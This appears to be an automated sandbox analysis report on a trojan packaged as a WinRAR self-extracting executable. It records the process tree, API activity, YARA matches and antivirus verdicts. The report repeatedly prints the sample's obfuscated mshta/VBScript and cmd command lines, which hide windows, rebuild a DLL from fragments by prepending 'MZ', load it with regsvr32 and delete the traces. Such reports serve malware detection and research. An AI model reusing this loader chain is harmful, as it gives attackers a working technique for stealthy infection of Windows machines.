Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 24, 2021, 7:05 p.m.	June 24, 2021, 7:09 p.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`c8d1263386f7cb98ca1795ba2558a443`
SHA256	`a56fd1905d2af8a3a945ca699d94a4e1dff1759c719284af3ca975e47d150be5`
CRC32	`A6461225`
ssdeep	`49152:NsrFa7LUfPSDdjfoaanX3Kv24Dpdj0JK3iKrSbc1Qwf:urg7LaSxDjjv2SdguiKrHQwf`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description)

sfx_123_701.exe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"
3204
- mshta.exe "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
  4936
  - cmd.exe "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
    9076
    - p10.EXE ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA
      6116
      - mshta.exe "C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
        3908
        
        cmd.exe "C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
        9168
      - mshta.exe "C:\Windows\System32\mshta.exe" vBscRiPT: ClOsE (creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO | set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " ,0 , TrUe) )
        4404
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c EcHO | set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q *
        2600
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        3684
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>5DNzNJQ.S"
        6076
        
        regsvr32.exe regsvr32 -S ..\0BSXD.7 -u
        6460
    - taskkill.exe taskkill /F /iM "sfx_123_701.exe"
      8548
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
172.217.25.14	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW June 24, 2021, 7:05 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: SUCCESS: The process "sfx_123_701.exe" with PID 3204 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: The process cannot access the file because it is being used by another process. console_handle: 0x0000000b	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: 5DNzNJQ.S console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: C5sPli.Uos console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: VpRQ5t.Th console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: IldCx.km console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: I5GP.~f console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: i3Ip.U console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: GH57xj.FI console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: 4wI_.RJj console_handle: 0x00000007	1	1
WriteConsoleW June 24, 2021, 7:05 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 24, 2021, 7:05 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

Allocates read-write-execute memory (usually to unpack itself) (10 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 3204 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 4936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 6116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02252000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 3908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 4404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 6460 region_size: 1400832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 6460 region_size: 1400832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2d0f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 6460 region_size: 696320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b80000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 6460 region_size: 704512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e50000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 7:05 p.m.	process_identifier: 6460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\p10.EXE

Creates a suspicious process (15 events)

cmdline	cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline	"C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline	msHTa vBscRiPT: ClOsE (creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO \| set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " ,0 , TrUe) )
cmdline	CmD.ExE /c EcHO \| set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q *
cmdline	"C:\Windows\System32\cmd.exe" /c EcHO \| set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q *
cmdline	msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline	C:\Windows\system32\cmd.exe /S /D /c" EcHO "
cmdline	C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>5DNzNJQ.S"
cmdline	regsvr32 -S ..\0BSXD.7 -u
cmdline	"C:\Windows\System32\mshta.exe" vBscRiPT: ClOsE (creATEobJEct ("WScRipt.SHeLl" ). RUN ( "CmD.ExE /c EcHO \| set /p = ""MZ"" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH + ILDCx.kM + I5GP.~F+ I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * " ,0 , TrUe) )
cmdline	cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline	"C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline	"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline	"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline	msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\0BSXD.7

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sfx_123_701.exe")

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 24, 2021, 7:05 p.m.	show_type: 0 filepath_r: cMD.exE parameters: /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy" filepath: cMD.exE	1	1
ShellExecuteExW June 24, 2021, 7:05 p.m.	show_type: 0 filepath_r: cMD.exE parameters: /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy" filepath: cMD.exE	1	1
ShellExecuteExW June 24, 2021, 7:05 p.m.	show_type: 0 filepath_r: CmD.ExE parameters: /c EcHO \| set /p = "MZ" > 5DNzNJQ.S & COpy /B /y 5dNZNJQ.S + C5sPLI.Uos + VPRQ5T.TH+ ILDCx.kM + I5GP.~F+I3Ip.U+ GH57xJ.FI +4WI_.RJJ ..\0BSXD.7 &stArt regsvr32 -S ..\0BSXD.7 -u & del /q * filepath: CmD.ExE	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 24, 2021, 7:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://purl.org/rss/1.0/
url	http://www.passport.com

Yara rule detected in process memory (50 out of 70 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Hijack network configuration	rule	Hijack_Network
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess June 24, 2021, 7:05 p.m.	status_code: 0x00000001 process_identifier: 3204 process_handle: 0x00000184		0	0
NtTerminateProcess June 24, 2021, 7:05 p.m.	status_code: 0x00000001 process_identifier: 3204 process_handle: 0x00000184	1	0	0

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline	"C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline	taskkill /F /iM "sfx_123_701.exe"
cmdline	msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline	cMD.exE /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline	"C:\Windows\System32\mshta.exe" VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if """"== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )
cmdline	"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_701.exe" ) do taskkill /F /iM "%~Nxy"
cmdline	"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\test22\AppData\Local\Temp\p10.EXE" >..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if "/p_8iDTu8WOQhSddreORkOSGjjYA "== "" for %y IN ( "C:\Users\test22\AppData\Local\Temp\p10.EXE" ) do taskkill /F /iM "%~Nxy"
cmdline	msHtA.exE VbscriPt: ClOsE ( CREATEOBjECT ("WsCRIpt.SHELl").RUn( "cMD.exE /q /c TYpe ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" > ..\p10.EXE && sTARt ..\P10.Exe /p_8iDTu8WOQhSddreORkOSGjjYA & if ""/p_8iDTu8WOQhSddreORkOSGjjYA ""== """" for %y IN ( ""C:\Users\test22\AppData\Local\Temp\p10.EXE"" ) do taskkill /F /iM ""%~Nxy"" " , 0 , TRUE ) )

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 9076 resumed a thread in remote process 6116
Process injection	Process 6116 resumed a thread in remote process 4404
Process injection	Process 2600 resumed a thread in remote process 6460
NtResumeThread June 24, 2021, 7:05 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 6116	1	0	0
NtResumeThread June 24, 2021, 7:05 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 4404	1	0	0
NtResumeThread June 24, 2021, 7:05 p.m.	thread_handle: 0x0000008c suspend_count: 0 process_identifier: 6460	1	0	0

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

Bkav	W32.AIDetect.malware1
Cynet	Malicious (score: 100)
FireEye	Generic.mg.c8d1263386f7cb98
AegisLab	Trojan.Multi.Generic.4!c
Sangfor	Trojan.Win32.Save.a
BitDefender	Trojan.GenericKD.46534066
CrowdStrike	win/malicious_confidence_70% (W)
Symantec	Trojan.Gen.2
APEX	Malicious
Kaspersky	Trojan.Win32.Qshell.ffg
MicroWorld-eScan	Trojan.GenericKD.46534066
SentinelOne	Static AI - Suspicious PE
GData	Trojan.GenericKD.46534066
MAX	malware (ai score=83)
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Microsoft	Trojan:Win32/Bunitucrypt.RW!MTB
McAfee	Artemis!C8D1263386F7
Cylance	Unsafe
Zoner	Probably Heur.RARAutorun
Webroot	W32.Trojan.Gen

sfx_123_701.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All